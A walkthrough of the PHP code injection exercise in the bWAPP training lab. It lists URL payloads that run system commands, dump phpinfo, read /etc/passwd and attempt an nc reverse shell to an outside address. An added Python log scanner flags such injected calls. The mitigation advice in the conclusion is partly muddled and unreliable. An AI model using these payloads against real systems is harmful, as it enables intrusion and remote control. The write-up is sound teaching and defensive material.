In this walkthrough, we will go through the PHP Code Injection vulnerability section of bWAPP Labs. We will explore and exploit PHP Code Injection on a test page and learn how applications are affected by it. So, let’s get started with the hacking without any delay.
Security: Low
- Setting the security level to Low.
- The application issues a GET request when the message is clicked and displays the message. By default, the message is set to “test”.
- I used the below payloads to check if the application is vulnerable to a PHP injection attack, and I got the output.
localhost/phpi.php?message=Hello;system("whoami");
localhost/phpi.php?message=Hello;phpinfo()
localhost/phpi.php?message=Hello;system("cat /etc/passwd")
- I tried to get a reverse shell using the below payload; however, I was unable to for some reason.
localhost/phpi.php?message=test;system("nc 192.168.29.81 4444 -e /bin/bash");
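A detection check for requests like the ones above, as an added example that is not part of the original walkthrough: it URL-decodes the `message` parameter from web server access-log lines and flags values that chain a PHP function call after a `;`. The log lines, the function names and the list of flagged calls are constructed here as assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# PHP functions seen in the walkthrough's payloads and named in its conclusion
# (the exact list is an assumption made for this example).
RISKY_CALLS = ("system", "exec", "shell_exec", "passthru", "phpinfo", "eval")
CALL_RE = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(", re.IGNORECASE)
# A ';' followed by something shaped like a function call.
CHAINED_RE = re.compile(r";\s*[A-Za-z_]\w*\s*\(")
# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not captured traffic
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /phpi.php?message=test HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /phpi.php?message=Hello;system(%22whoami%22) HTTP/1.1" 200 530',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /phpi.php?message=Hello;phpinfo() HTTP/1.1" 200 90412',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /phpi.php?message=Call+the+system+admin%3B+thanks HTTP/1.1" 200 540',
]

def suspicious_message(value):
    """Return the reasons a decoded parameter value looks like injected PHP."""
    reasons = []
    calls = sorted({m.group(1).lower() for m in CALL_RE.finditer(value)})
    if calls:
        reasons.append("php call: " + ", ".join(calls))
    if CHAINED_RE.search(value):
        reasons.append("statement separator followed by a call")
    return reasons

def scan(log_lines, param="message"):
    """Return (line_number, decoded_value, reasons) for each flagged request."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # Split on '&' only: ';' must stay inside the value being inspected.
        for pair in urlsplit(match.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            if unquote_plus(name) != param:
                continue
            value = unquote_plus(raw)
            reasons = suspicious_message(value)
            if reasons:
                findings.append((number, value, reasons))
    return findings

if __name__ == "__main__":
    for number, value, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {value!r} -> {'; '.join(reasons)}")
```

The fourth sample line contains both the word "system" and a `;` but is not flagged, because neither is followed by call syntax.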
Security: Medium & High
- The application is not vulnerable at the Medium and High levels, as the code now uses the htmlspecialchars function instead of the vulnerable eval function.
Conclusion:
So, we finally completed all the security levels for the bWAPP PHP Code Injection vulnerability. We looked at how the application has been set up at the various levels and how we can bypass the security controls implemented. PHP Code Injection attacks can be mitigated by avoiding dangerous functions like exec(), shell_exec(), system() and passthru(). Along with that, we should perform code serialization and use a PHP security linter. On that note, I will take your leave and will meet you in the next one with another bWAPP vulnerability writeup; till then, “Keep Hacking”.